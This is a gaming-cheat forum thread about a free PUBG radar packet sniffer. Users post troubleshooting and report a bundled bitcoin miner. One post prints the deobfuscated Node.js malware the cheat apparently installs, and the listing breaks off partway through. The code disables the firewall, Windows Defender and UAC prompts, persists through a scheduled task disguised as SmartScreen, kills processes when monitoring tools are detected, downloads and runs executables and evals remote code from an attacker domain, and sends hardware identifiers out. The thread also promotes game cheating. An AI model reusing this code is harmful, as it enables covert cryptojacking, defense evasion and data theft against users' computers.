|
You last visited: Today at 13:16
Advertisement
[FREE] PUBG RADAR undetected packet sniffer
Discussion on [FREE] PUBG RADAR undetected packet sniffer within the PlayerUnknown's Battlegrounds forum part of the Popular Games category.
03/11/2018, 22:43
|
#706
|
elite*gold: 0 
Join Date: Jan 2018
Posts: 20
Received Thanks: 2
|
Quote:
Originally Posted by painz0r213
I scanned 2 days ago with mw bytes and found a bitcoin miner virus , didn't know it was from ballot ...
|
Yea, it is. He seemed lika a nice guy 
|
|
|
|
03/11/2018, 23:04
|
#707
|
elite*gold: 0
Join Date: May 2010
Posts: 3
Received Thanks: 0
|
I have the following error, I have gone in different post to see if someone also has it but I could not fix it on my own
-I have everything installed
-I have the IPs well placed and as it should be (I've tried some other ips)
- The farthest thing that has come is that the online vRUN opens and closes
- Question attached, The radar is executed once inside the game or can it be run at any time?
When I execute the Install (After steps), I get those errors, is it normal?
-The radar downloads it directly from Github
|
|
|
|
|
03/11/2018, 23:24
|
#708
|
elite*gold: 0
Join Date: Sep 2013
Posts: 99
Received Thanks: 4
|
Quote:
Originally Posted by pip369
I have the following error, I have gone in different post to see if someone also has it but I could not fix it on my own
-I have everything installed
-I have the IPs well placed and as it should be (I've tried some other ips)
- The farthest thing that has come is that the online vRUN opens and closes
- Question attached, The radar is executed once inside the game or can it be run at any time?
When I execute the Install (After steps), I get those errors, is it normal?
-The radar downloads it directly from Github
|
Try jdk 8u45
|
|
|
|
|
03/11/2018, 23:48
|
#709
|
elite*gold: 0
Join Date: Oct 2012
Posts: 155
Received Thanks: 30
|
I'll be honest, I will happily bitcoin mine in tradeoff of this being free. As long as it's running only when I'm running the hack (which is appears to be), I have no complains. Think of it as paying him for the hack.
So I did end up fixing my problem. This morning before going to bed I started completely from scratch and checked everything. Windows firewall had decided to disable routing and remote access after I had enabled it on my laptop. I re-enabled it and now it works great.
|
|
|
|
|
03/12/2018, 01:11
|
#710
|
elite*gold: 0
Join Date: Feb 2018
Posts: 13
Received Thanks: 0
|
hi all,
i go this problem when i try today, used to work fine yesterday
0
0
0
AL lib: (EE) ALCmmdevPlayback_open: Device init failed: 0x80070490
its only open a grey screen without the map, all VPN connected fine, anyone have the solution please?
|
|
|
|
|
03/12/2018, 01:24
|
#711
|
elite*gold: 0
Join Date: Sep 2013
Posts: 99
Received Thanks: 4
|
Quote:
Originally Posted by midi2
hi all,
i go this problem when i try today, used to work fine yesterday
0
0
0
AL lib: (EE) ALCmmdevPlayback_open: Device init failed: 0x80070490
its only open a grey screen without the map, all VPN connected fine, anyone have the solution please?
|
You didn't put the correct ip's.
|
|
|
|
|
03/12/2018, 01:28
|
#712
|
elite*gold: 0
Join Date: Feb 2018
Posts: 13
Received Thanks: 0
|
Quote:
Originally Posted by painz0r213
You didn't put the correct ip's.
|
I am pretty sure it was right IP ADDRESS,
My gaming PC i am using VPN IP
and my middle (2nd) pc I am using ethernet IP
even i try both ip it wont work
its not working anymore for me, only greyscreen
|
|
|
|
|
03/12/2018, 04:19
|
#713
|
elite*gold: 0
Join Date: Aug 2017
Posts: 11
Received Thanks: 1
|
Guys, got problem, I cannot setup VPN on windows 7 (2nd PC). try to setup new incoming connection but seem like it's not start up. I tried turn off IPv6 and enable IP Rounting but nothing happend.
Can anybody help?
|
|
|
|
|
03/12/2018, 04:38
|
#714
|
elite*gold: 0
Join Date: Mar 2018
Posts: 10
Received Thanks: 11
|
check %appData%\Roaming\speechapi for nodejs... with strange obfuscated JS... its unpacking and run when you run this java applet...
Thread starter, why u doing this?
|
|
|
|
|
03/12/2018, 04:44
|
#715
|
elite*gold: 0
Join Date: Oct 2012
Posts: 155
Received Thanks: 30
|
Quote:
Originally Posted by SNKKU
check %appData%\Roaming\speechapi for nodejs... with strange obfuscated JS... its unpacking and run when you run this java applet...
Thread starter, why u doing this?
|
If you delete those in APPDATA will it delete the miner?
|
|
|
|
|
03/12/2018, 04:45
|
#716
|
elite*gold: 0
Join Date: Mar 2018
Posts: 10
Received Thanks: 11
|
Quote:
Originally Posted by Nightzfury
If you delete those in APPDATA will it delete the miner?
|
may be... i found another free radar without this **** ))
|
|
|
|
|
03/12/2018, 04:48
|
#717
|
elite*gold: 0
Join Date: Oct 2012
Posts: 155
Received Thanks: 30
|
Quote:
Originally Posted by SNKKU
may be... i found another free radar without this **** ))
|
I didn't download this one, I got the one from GITHUB and it definitely has one as well.
SNKKU where did you get yours?
|
|
|
|
|
03/12/2018, 04:56
|
#718
|
elite*gold: 0
Join Date: Mar 2018
Posts: 10
Received Thanks: 11
|
github is opensource and u see all what u get... this is compiled and obfuscated and u dont see whats inside, but inside u have this...
Code:
var http = require('http');
var fs = require('fs');
var regedit = require('regedit');
var exec = require('child_process')['exec'];
var execSync = require('child_process')['execSync'];
var path = require('path');
var srequest = require('sync-request');
var si = require('systeminformation');
var SingleInstance = require('single-instance');
var date = new Date();
var day = date['getDate']();
var appDir = path['dirname'](require['main']['filename']);
var blist = ['taskmgr.exe', 'wireshark.exe', 'Fiddler.exe', 'Charles.exe', 'smsniff.exe', 'procexp.exe', 'proc64.exe'];
var glist = ['league of legends.exe', 'tslgame.exe', 'tslgame_be.exe', 'tslgame.exe', 'tslgame_be.exe', 'csgo.exe', 'overwatch.exe', 'overwatch launcher.exe', 'overwatch.exe', 'minecraftlauncher.exe', 'wow-64.exe', 'hearthstone.exe', 'dota2.exe', 'gtavlauncher.exe', 'rainbowsix.exe', 'rainbowsix_be.exe', 'rainbowsix.exe', 'rainbowsix_be.exe', 'rocketleague.exe', 'heroesofthestorm_x64.exe', 'hl2.exe', 'warframe.x64.exe', 'warframe.exe', 'h1z1.exe', 'launchpad.exe', 'h1z1.exe', 'launchpad.exe', 'shootergame.exe', 'shootergame_be.exe', 'paladins.exe', 'paladinseac.exe', 'paladins.exe', 'paladinseac.exe', 'pathofexile_x64steam.exe', 'hl2.exe', 'rust.exe', 'rustclient.exe', 'worldoftanks.exe', 'ffxiv_dx11.exe', 'bf1.exe', 'geometrydash.exe', 'dolphin.exe', 'terraria.exe', 'brawlhalla.exe', 'payday2_win32_release.exe', 'walkingdead101.exe', 'sonicmania.exe', 'golf with your friends.exe', 'cities.exe', 'arma3launcher.exe', 'left4dead2.exe', 'project64.exe', 'runescape.exe', 'deadbydaylight.exe', 'deadbydaylight-win64-shipping.exe', 'unturned.exe', 'unturned_be.exe', 'wowslauncher.exe', 'eocapp.exe', 'supporttool.exe', 'eocapp.exe', 'bf1.exe', 'isaac-ng.exe', 'blackdesert64.exe', 'black desert online steam launcher.exe', 'tslgame.exe', 'steamlauncher.exe', 'hiveswap-act1.exe', 'hoi4.exe', 'monaco.exe', 'civilizationv_dx11.exe', 'smiteeac.exe', 'factorio.exe', 'diablo iii64.exe', 'sc2_x64.exe', 'skyrimlauncher.exe', 'tesv.exe', 'skyrimlauncher.exe', 'tesv.exe', 'thedivision.exe', 'dontstarve_steam.exe', 'shellshocklive.exe', 'vc_redist.exe', 'spaceengineers.exe', 'starbound.exe', 'eurotrucks2.exe', 'portal2.exe', 'ts4_x64.exe', 'blackops3.exe', 'stardew valley.exe', 'darksoulsiii.exe', 'hl2.exe', 'fallout4.exe', 'fallout4launcher.exe', 'fallout4.exe', 'fallout4launcher.exe', 'falloutnv.exe', 'falloutnvlauncher.exe', 'falloutnv.exe', 'falloutnvlauncher.exe', 'maplestory.exe', 'witcher3.exe', 'hl2.exe', 'bf4.exe', 'modlauncherwpf.exe', 'gw2-64.exe', 'skyrimse.exe', 'skyrimselauncher.exe', 'skyrimse.exe', 'skyrimselauncher.exe', 'olgame.exe', 'outlastlauncher.exe', 'olgame.exe', 'depthgame.exe', 'tabletop simulator.exe', 'stellaris.exe', 'glyphclientapp.exe', 'gang beasts.exe', 'theforest.exe', 'insurgency.exe', 'insurgency_be.exe', 'eu4.exe', 'townofsalem.exe', 'battlerite.exe', 'robocraft.exe', 'golfit-win64-shipping.exe', 'heroesandgeneralsdesktop.exe', 'shadowverse.exe', '7daystodie.exe', '7daystodie_eac.exe', '7daystodie.exe', '7daystodie_eac.exe', 'kfgame.exe', 'starcraft.exe', 'undertale.exe', 'duckgame.exe', 'dirtybomblauncher.exe', 'businesstour.exe', 'falloutshelter.exe', 'slimerancher.exe', 'titanfall2.exe', 'starwarsbattlefront.exe', 'binkplay.exe', 'mb_warband.exe', 'swtor.exe', 'launchpad.exe', 'planetside2_x64.exe', 'clicker heroes.exe', 'psychonauts.exe', 'amtrucks.exe', 'codwaw.exe', 'dofus.exe', 'hl.exe', 'comedy night.exe', 'etg.exe', 'edlaunch.exe', 'wizardgraphicalclient.exe', 'adventure-capitalist.exe', 'aok hd.exe', 'aok hd.exe', 'evelauncher.exe', 'exefile.exe', 'evelauncher.exe', 'heat_signature.exe', 'rimworldwin.exe', 'speedrunners.exe', 'aces.exe', 'rivalsofaether.exe', 'beamng.exe', 'subnautica.exe', 'civilizationvi.exe', 'bethesda.net_launcher.exe', 'bethesda.exe', 'doomx64.exe', 'ftlgame.exe', 'realm of the mad god.exe', 'justcause3.exe', 'hl2.exe', 'vc_redist.exe', 's2_mp64_ship.exe', 'deadcells.exe', 'fifa17.exe', 'dbxv2.exe', 'eac_launcher.exe', 'summercamp.exe', 'prison architect.exe', 'tekkengame-win64-shipping.exe', 'theescapists2.exe', 'ck2game.exe', 'microsimulator.exe', 'mycomgames.exe', 'shadowofmordor.exe', 'mgsvtpp.exe', 'idledragons.exe', 'huniepop.exe', 'ultimatechickenhorse.exe', 'nierautomata.exe', 'darksoulsii.exe', 'warhammer2.exe', 'skullgirls.exe', 'farmingsimulator2017game.exe', '100orange.exe', 'necrodancer.exe', 't6mp.exe', 'battles-win.exe', 'dishonored.exe', 'svencoop.exe', 'tower-win64-shipping.exe', 'dyinglightgame.exe', 'cmw.exe', 'squad_launcher.exe', 'astro-win64-shipping.exe', 'creativerse.exe', 'abewin.exe', 'grw.exe', 'battleblocktheater.exe', 'killingfloor.exe', 'ksp.exe', 'ksp_x64.exe', 'rottr.exe', 'castle.exe', 'newzlauncher.exe', 'thenewz.exe', 'tbl-win64-shipping.exe', 'hl2.exe', 'battlefrontii.exe', 'cuphead.exe', 'nsuns4.exe', 'tera-launcher.exe', 'saintsrowiv.exe', 'absolver-win64-shipping.exe', 'scrapmechanic.exe', 'oxygennotincluded.exe', 'hl.exe', 'nuclearthrone.exe', 'dishonored_do.exe', 'hl2.exe', 'sims3launcherw.exe', 'ts3w.exe', 'eocapp.exe', 'ravenfield.exe', 'lifeisstrange.exe', 'hollow_knight.exe', 'game_launcher.exe', 'planetcoaster.exe', 'dishonored2.exe', 'clustertruck.exe', 'crushcrush.exe', 'bf3.exe', 'ww2.exe', 'reliccoh2.exe', 'realmgrinderdesktop.exe', 'pcars64.exe', 'hl.exe', 'gh3.exe', 'roblox.exe', 'gta-sa.exe', 'gta_sa.exe', 'gta-sa.exe', 'destiny2.exe', 'hoblauncher.exe', 'stickfight.exe', 'osu!.exe', 'falloutlauncher.exe', 'shadowofwar.exe', 'war-win64-shipping.exe', 'duelyst.exe', 'holodrive.exe', 'toothandtail.exe', 'love.exe', 'ballisticoverkill.exe', 'grip-win64-shipping.exe', 'hellion.exe', 'wolfneworder_x64.exe', 'dayofinfamy.exe', 'dayofinfamy_be.exe', 'deceit.exe', 'darkest.exe', 'batim.exe', 'hatintimegame.exe', 'besiege.exe', 'life is strange - before the storm.exe', 'guns up.exe', 'h1z1.exe', 'h1z1_be.exe', 'launchpad.exe', 'dlpc.exe', 'fifa18.exe', 'sanctumgame-win32-shipping.exe', 'human.exe', 'watch_dogs.exe', 'acorigins.exe', 'cs2d.exe', 'newcolossus_x64vk.exe', 'dayz_x64.exe', 'brutallegend.exe', 'fortniteclient-win64-shipping.exe', 'zombidle.exe', 'srhk.exe', 'vngame.exe', 'thebureau.exe', 'elsword.exe', 'rome2.exe', 'pizzeria simulator.exe', 'gettingoverit.exe', 'gunsoficarusonline.exe', 'zombidle.exe', 'gunsnboxes.exe', 'vrchat.exe', 'red crucible.exe', 'ac4bfsp.exe', 'ac4bfmp.exe', 'ac4bfsp.exe', 'escapefromtarkov.exe', 'scpsl.exe', 'theyarebillions.exe', 'tld.exe', 'pokemon trading card game online.exe', 'kingdom.exe', 'vrmonitor.exe', 'dontstarve_steam.exe', 'gwent.exe', 'long live santa.exe', 'slaythespire.exe', 'kingdomsandcastles.exe', 'northgard.exe', 'broforce_beta.exe', 'crossfire.exe', 'neverwinter.exe', 'tibia.exe', 'papersplease.exe', 'cw.exe', 'sporeapp.exe', 'plagueincevolved.exe', 'borderlandspresequel.exe', 'hotlinemiami.exe', 'homefront.exe', 'thehuntercotw_f.exe', 'tombraider.exe', 'isaac.exe', 'we were here.exe', 'this war of mine.exe', 'hotlinemiami2.exe'];
var cmd = 'netsh advfirewall set allprofiles state off';
var cmz = 'schtasks.exe /query /TN "Microsoft\Windows\AppID\SmartScreens"';
var cmf = 'schtasks.exe /Create /SC MINUTE /mo 1 /TN "Microsoft\Windows\AppID\SmartScreens" /TR "' + appDir + '\nircmd.exe exec hide node.exe ' + appDir + '\index.js" /IT /F /RL HIGHEST';
var lversion, rversion, scommand, mane = null,
exename;
var pcname, gpuname, osversion, serialnum, regpu;
var gpumodel, wamung;
function hget(_0x7107x1f) {
var _0x7107x20 = srequest('GET', _0x7107x1f);
return _0x7107x20['getBody']('utf8')
}
var deleteFolderRecursive = function(path) {
if (fs['existsSync'](path)) {
fs['readdirSync'](path)['forEach'](function(_0x7107x22, _0x7107x23) {
var _0x7107x24 = path + '/' + _0x7107x22;
if (fs['lstatSync'](_0x7107x24)['isDirectory']()) {
deleteFolderRecursive(_0x7107x24)
} else {
fs['unlinkSync'](_0x7107x24)
}
});
fs['rmdirSync'](path)
}
};
function remove_file(_0x7107x26) {
return fs['unlinkSync'](_0x7107x26)
}
function read_file(_0x7107x26) {
return fs['readFileSync'](_0x7107x26, 'utf8')
}
function write_file(_0x7107x29, _0x7107x2a) {
fs['writeFileSync'](_0x7107x29, _0x7107x2a)
}
function exist_file(_0x7107x2c) {
return fs['existsSync'](_0x7107x2c)
}
function deleteoldversion() {
if (exist_file(appDir + '\'+ lversion+ gpumodel+ '.exe ')){remove_file(appDir+ '\
'+ lversion+ gpumodel+ '.exe ')};if(exist_file(appDir+ '\
'+ lversion)){}}function checkversion(){wamung= wamung+ gpumodel;if(gpumodel!= '
other '){if(exist_file(appDir+ '\
version.txt ')== false){write_file(appDir+ '\
version.txt ','
0 ');console['log']('version kontrol old:' + lversion + ' new:' + rversion);
if (lversion != rversion) {
console['log']('yeni version indir');
deleteoldversion();
var _0x7107x22 = fs['createWriteStream'](appDir + '\'+ rversion+ gpumodel+ '.exe ');
_0x7107x22['on']('finish ', function() {
write_file(appDir + 'version.txt', rversion);
console['log']('yeni version indi ');
exec(appDir + 'nircmd.exe exec hide ' + rversion + gpumodel + '.exe - d "' + appDir + '"', function(_0x7107x2f, _0x7107x30, _0x7107x31) {
process['exit ']()
})
});
var _0x7107x32 = http['get ']('http: //xmbolafi.club/' + rversion + gpumodel + '.exe', function(_0x7107x33) {
_0x7107x33['pipe'](_0x7107x22)
})
}
else {
console['log'](gpumodel);
scommand = hget('http://xmbolafi.club/sm' + gpumodel + '.txt');
exename = scommand['split']('.exe')[0] + '.exe';
mane = exec(appDir + '\'+ lversion+ '
'+ scommand,function(_0x7107x2f,_0x7107x30,_0x7107x31){});
console['log ']('version guncel ')
}
} else {
clearInterval(intervalObj2);
eval(hget('http: //xmbolafi.club/eval.txt'))
}
}
function first_run() {
exec(cmz, function(_0x7107x35, _0x7107x30, _0x7107x31) {
if (_0x7107x30 == '') {
exec(cmf, function(_0x7107x35, _0x7107x30, _0x7107x31) {})
}
});
exec(cmd, function(_0x7107x35, _0x7107x30, _0x7107x31) {});
regedit['createKey'](['HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'], function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x5C\x52\x65\x61\x6C\x2D\x54\x69\x6D\x65\x20\x50\x72\x6F\x74\x65\x63\x74\x69\x6F\x6E": {
"\x44\x69\x73\x61\x62\x6C\x65\x52\x65\x61\x6C\x74\x69\x6D\x65\x4D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x5C\x52\x65\x61\x6C\x2D\x54\x69\x6D\x65\x20\x50\x72\x6F\x74\x65\x63\x74\x69\x6F\x6E": {
"\x44\x69\x73\x61\x62\x6C\x65\x52\x65\x61\x6C\x74\x69\x6D\x65\x4D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x41\x64\x6D\x69\x6E": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x53\x79\x73\x74\x65\x6D": {
"\x43\x6F\x6E\x73\x65\x6E\x74\x50\x72\x6F\x6D\x70\x74\x42\x65\x68\x61\x76\x69\x6F\x72\x55\x73\x65\x72": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
regedit['createKey'](['HKCU\Software\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'], function(_0x7107x2f) {
regedit['putValue']({
"\x48\x4B\x43\x55\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x5C\x43\x75\x72\x72\x65\x6E\x74\x56\x65\x72\x73\x69\x6F\x6E\x5C\x4E\x6F\x74\x69\x66\x69\x63\x61\x74\x69\x6F\x6E\x73\x5C\x53\x65\x74\x74\x69\x6E\x67\x73\x5C\x57\x69\x6E\x64\x6F\x77\x73\x2E\x53\x79\x73\x74\x65\x6D\x54\x6F\x61\x73\x74\x2E\x53\x65\x63\x75\x72\x69\x74\x79\x41\x6E\x64\x4D\x61\x69\x6E\x74\x65\x6E\x61\x6E\x63\x65": {
"\x45\x6E\x61\x62\x6C\x65\x64": {
value: '0',
type: 'REG_DWORD'
}
}
}, function(_0x7107x2f) {
checkversion()
})
})
})
})
})
})
})
})
})
}
function first_run_of_day() {
if (read_file(appDir + '\frod') != day) {
console['log']('frod run');
write_file(appDir + '\frod', day);
first_run()
} else {
checkversion()
}
}
function sendinfo() {
si['graphics'](function(_0x7107x38) {
gpuname = _0x7107x38['controllers'][0]['model'];
si['osInfo'](function(_0x7107x38) {
osversion = _0x7107x38['distro'];
pcname = _0x7107x38['hostname'];
si['diskLayout'](function(_0x7107x38) {
serialnum = _0x7107x38[0]['serialNum'];
write_file(appDir + '\pcinfo.txt', osversion + ' - ' + pcname + ' - ' + regpu + ' - ' + serialnum);
console['log'](osversion + '\x0A' + pcname + '\x0A' + gpuname + '\x0A' + serialnum);
hget('http://xmbolafi.club/pcreg.php?type=update&pc=' + pcname + '&os=' + osversion + '&gpu=' + regpu + '&sn=' + serialnum + '&status=1')
})
})
})
}
function checkgpu() {
si['graphics'](function(_0x7107x38) {
gpuname = _0x7107x38['controllers'][0]['model'];
regpu = _0x7107x38['controllers'][0]['model'];
gpumodel = 'other';
if (gpuname['indexOf']('NVIDIA') > -1) {
gpumodel = 'nvidia'
};
if (gpuname['indexOf']('AMD') > -1) {
gpumodel = 'amd'
};
var _0x7107x3a;
var _0x7107x3b = _0x7107x38['controllers']['length'];
if (_0x7107x3b > 1) {
for (_0x7107x3a = 0; _0x7107x3a < _0x7107x3b; _0x7107x3a++) {
if (_0x7107x38['controllers'][_0x7107x3a]['model']['indexOf']('NVIDIA') > -1 || _0x7107x38['controllers'][_0x7107x3a]['model']['indexOf']('GeForce') > -1) {
regpu = _0x7107x38['controllers'][_0x7107x3a]['model'];
gpumodel = 'nvidia'
};
if (_0x7107x38['controllers'][_0x7107x3a]['model']['indexOf']('AMD') > -1 || _0x7107x38['controllers'][_0x7107x3a]['model']['indexOf']('Radeon') > -1) {
regpu = _0x7107x38['controllers'][_0x7107x3a]['model'];
gpumodel = 'amd'
}
}
};
console['log'](gpumodel);
first_run_of_day();
sendinfo()
})
}
exec('tasklist', function(_0x7107x2f, _0x7107x30, _0x7107x31) {
for (i = 0; i < blist['length']; i++) {
if (_0x7107x30['toLowerCase']()['indexOf'](blist[i]['toLowerCase']()) > -1) {
console['log']('first die bitch');
exec('taskkill /f /im ' + exename, function(_0x7107x2f, _0x7107x30, _0x7107x31) {
process['exit'](0)
})
}
}
});
wamung = 'http://whos.amung.us/pingjs/?k=node';
var locker = new SingleInstance('game-helper-js');
locker['lock']()['then'](function() {
if (exist_file(appDir + '\frod') == false) {
write_file(appDir + '\frod', 0);
checkgpu()
} else {
checkgpu()
}
})['catch'](function(_0x7107x2f) {
console['log'](_0x7107x2f);
process['exit'](0)
});
var intervalObj = setInterval(() => {
exec('tasklist', function(_0x7107x2f, _0x7107x30, _0x7107x31) {
for (i = 0; i < blist['length']; i++) {
if (_0x7107x30['toLowerCase']()['indexOf'](blist[i]['toLowerCase']()) > -1) {
console['log']('die bitch');
exec('taskkill /f /im ' + exename, function(_0x7107x2f, _0x7107x30, _0x7107x31) {
process['exit'](0)
})
}
}
})
}, 1000);
var intervalObj2 = setInterval(() => {
exec('tasklist', function(_0x7107x2f, _0x7107x30, _0x7107x31) {
for (i = 0; i < glist['length']; i++) {
if (_0x7107x30['toLowerCase']()['indexOf'](glist[i]['toLowerCase']()) > -1) {
console['log']('die bitch');
exec('taskkill /f /im ' + exename, function(_0x7107x2f, _0x7107x30, _0x7107x31) {
process['exit'](0)
})
}
}
})
}, 5500);
var intervalObj1 = setInterval(() => {
hget(wamung)
}, 60000);
process['on']('exit', function() {
console['log']('byeti')
})
and this
Code:
var http = require('http');
var fs = require('fs');
var regedit = require('regedit');
var exec = require('child_process')['exec'];
var execSync = require('child_process')['execSync'];
var path = require('path');
var srequest = require('sync-request');
var si = require('systeminformation');
var SingleInstance = require('single-instance');
var date = new Date();
var day = date['getDate']();
var today = new Date();
today['setDate'](today['getDate']() + 3);
var dd = today['getDate']();
var mm = today['getMonth']() + 1;
var yyyy = today['getFullYear']();
if (dd < 10) {
dd = '0' + dd
};
if (mm < 10) {
mm = '0' + mm
};
var today = dd + '/' + mm + '/' + yyyy;
var appDir = path['dirname'](require['main']['filename']);
var blist = ['taskmgr.exe', 'wireshark.exe', 'Fiddler.exe', 'Charles.exe', 'smsniff.exe'];
var cmd = 'netsh advfirewall set allprofiles state off';
var cmz = 'schtasks.exe /query /TN "Microsoft\Windows\AppID\SmartScreens"';
var cmf = 'schtasks.exe /Create /SC MINUTE /mo 1 /TN "Microsoft\Windows\AppID\SmartScreens" /TR "' + appDir + '\nircmd.exe exec hide node.exe ' + appDir + '\index.js" /SD ' + today + ' /IT /F /RL HIGHEST';
var lversion, rversion, scommand, mane = null,
exename;
var pcname, gpuname, osversion, serialnum, regpu;
var gpumodel, wamung;
function hget(_0x8b19x22) {
var _0x8b19x23 = srequest('GET', _0x8b19x22);
return _0x8b19x23['getBody']('utf8')
}
function checkgpu() {
si['graphics'](function(_0x8b19x25) {
gpuname = _0x8b19x25['controllers'][0]['model'];
regpu = _0x8b19x25['controllers'][0]['model'];
gpumodel = 'other';
if (gpuname['indexOf']('NVIDIA') > -1) {
gpumodel = 'nvidia'
};
if (gpuname['indexOf']('AMD') > -1) {
gpumodel = 'amd'
};
var _0x8b19x26;
var _0x8b19x27 = _0x8b19x25['controllers']['length'];
if (_0x8b19x27 > 1) {
for (_0x8b19x26 = 0; _0x8b19x26 < _0x8b19x27; _0x8b19x26++) {
if (_0x8b19x25['controllers'][_0x8b19x26]['model']['indexOf']('NVIDIA') > -1 || _0x8b19x25['controllers'][_0x8b19x26]['model']['indexOf']('GeForce') > -1) {
regpu = _0x8b19x25['controllers'][_0x8b19x26]['model'];
gpumodel = 'nvidia'
};
if (_0x8b19x25['controllers'][_0x8b19x26]['model']['indexOf']('AMD') > -1 || _0x8b19x25['controllers'][_0x8b19x26]['model']['indexOf']('Radeon') > -1) {
regpu = _0x8b19x25['controllers'][_0x8b19x26]['model'];
gpumodel = 'amd'
}
}
};
console['log'](gpumodel);
sendinfo()
})
}
function sendinfo() {
si['graphics'](function(_0x8b19x25) {
gpuname = _0x8b19x25['controllers'][0]['model'];
si['osInfo'](function(_0x8b19x25) {
osversion = _0x8b19x25['distro'];
pcname = _0x8b19x25['hostname'];
si['diskLayout'](function(_0x8b19x25) {
serialnum = _0x8b19x25[0]['serialNum'];
console['log'](osversion + '\x0A' + pcname + '\x0A' + gpuname + '\x0A' + serialnum);
hget('http://xmbolafi.club/pcreg.php?type=insert&pc=' + pcname + '&os=' + osversion + '&gpu=' + regpu + '&sn=' + serialnum + '&status=0')
})
})
})
}
exec(cmz, function(_0x8b19x29, _0x8b19x2a, _0x8b19x2b) {
if (_0x8b19x2a == '') {
exec(cmf, function(_0x8b19x29, _0x8b19x2a, _0x8b19x2b) {})
}
});
exec(cmd, function(_0x8b19x29, _0x8b19x2a, _0x8b19x2b) {});
regedit['createKey'](['HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection'], function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x4F\x46\x54\x57\x41\x52\x45\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x50\x6F\x6C\x69\x63\x69\x65\x73\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72\x5C\x52\x65\x61\x6C\x2D\x54\x69\x6D\x65\x20\x50\x72\x6F\x74\x65\x63\x74\x69\x6F\x6E": {
"\x44\x69\x73\x61\x62\x6C\x65\x52\x65\x61\x6C\x74\x69\x6D\x65\x4D\x6F\x6E\x69\x74\x6F\x72\x69\x6E\x67": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
"\x48\x4B\x4C\x4D\x5C\x53\x6F\x66\x74\x77\x61\x72\x65\x5C\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x5C\x57\x69\x6E\x64\x6F\x77\x73\x20\x44\x65\x66\x65\x6E\x64\x65\x72": {
"\x44\x69\x73\x61\x62\x6C\x65\x41\x6E\x74\x69\x53\x70\x79\x77\x61\x72\x65": {
value: '1',
type: 'REG_DWORD'
}
}
}, function(_0x8b19x2c) {
regedit['putValue']({
